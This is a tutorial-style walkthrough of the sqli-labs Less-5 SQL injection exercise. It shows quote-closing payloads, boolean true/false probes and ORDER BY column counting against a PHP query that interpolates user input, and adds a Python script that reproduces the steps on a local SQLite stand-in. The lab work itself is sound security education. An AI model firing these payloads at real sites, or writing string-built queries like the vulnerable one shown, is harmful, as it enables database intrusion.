LESS-5
Looking at the source code gives
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
The value is wrapped in single quotes. If you request /?id=1 and 1=1 directly, the statement becomes
$sql="SELECT * FROM users WHERE id='1 and 1=1' LIMIT 0,1";
The whole payload stays inside the string literal, so "and 1=1" is compared as text instead of being evaluated as a condition, and the injection has no effect.
So the request has to be /?id=1' and '1'='1, which closes the opening quote and leaves the last quote to be closed by the one in the template. It goes into the statement as
$sql="SELECT * FROM users WHERE id='1' and '1'='1' LIMIT 0,1";
Then make the condition false to compare the responses:
$sql="SELECT * FROM users WHERE id='1' and '1'='2' LIMIT 0,1";
The first query returns the row for id 1 and the second returns nothing, so the page responds differently. That difference is the boolean signal that the injection is taking effect.
Then find the number of columns with ORDER BY, using /?id=1' order by 4 --+. The + is URL-decoded to a space, so the database sees "-- " and treats the trailing quote and LIMIT as a comment:
$sql="SELECT * FROM users WHERE id='1' order by 4 --+' LIMIT 0,1";
Raise the number until the database reports an error for the ORDER BY position; the largest value that still succeeds is the column count.
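The three steps above (quote closure, the true/false comparison, and ORDER BY column counting) reproduced against a local SQLite stand-in. This is an added example, not code from the original post or from sqli-labs: the users table with three columns (id, username, password) and its two rows are constructed here as an assumption, build_query mirrors the PHP interpolation of $id into the statement, and page() plays the role of the response check. The unquoted payload is shown to have no effect by comparing the responses for "1 and 1=1" and "1 and 1=2": on MySQL the string '1 and 1=1' is cast to 1 and both return the row, on SQLite neither matches, but either way the two responses are identical.

```python
import sqlite3
from urllib.parse import unquote_plus

# Constructed stand-in for the sqli-labs users table (assumption: three columns).
SCHEMA = """
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'Angelina', 'I-kill-you');
"""


def open_db() -> sqlite3.Connection:
    """In-memory database loaded with the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def build_query(raw_id: str) -> str:
    """Mirror $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    raw_id is the value as typed in the URL, so it is URL-decoded first:
    '+' becomes a space, which is what turns '--+' into the '-- ' comment."""
    return f"SELECT * FROM users WHERE id='{unquote_plus(raw_id)}' LIMIT 0,1"


def run(conn: sqlite3.Connection, raw_id: str):
    """Execute the interpolated statement. Returns (row_found, error_text)."""
    try:
        row = conn.execute(build_query(raw_id)).fetchone()
        return row is not None, None
    except sqlite3.OperationalError as exc:
        return False, str(exc)


def page(conn: sqlite3.Connection, raw_id: str) -> bool:
    """Boolean oracle: True when the query returned a row (the page shows
    its normal content), False when it returned nothing."""
    found, _ = run(conn, raw_id)
    return found


def column_count(conn: sqlite3.Connection, base: str = "1", limit: int = 10) -> int:
    """Raise ORDER BY n until the database errors on the position; the last n
    that worked is the number of columns in the SELECT."""
    count = 0
    for n in range(1, limit + 1):
        _, err = run(conn, f"{base}' order by {n} --+")
        if err:
            break
        count = n
    return count


if __name__ == "__main__":
    db = open_db()
    for payload in ["1 and 1=1", "1 and 1=2", "1' and '1'='1", "1' and '1'='2"]:
        print(f"{payload:18} -> {build_query(payload)}  row={page(db, payload)}")
    print("columns:", column_count(db))
```

The unquoted pair gives the same answer for true and false, so an attacker learns nothing from it; the quoted pair flips, which is the signal the post is looking for. column_count() stops at the first ORDER BY error, so it only needs the boolean/error behaviour of the page, not any data in the response.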
From: https://www.cnblogs.com/Zx770/p/17437923.html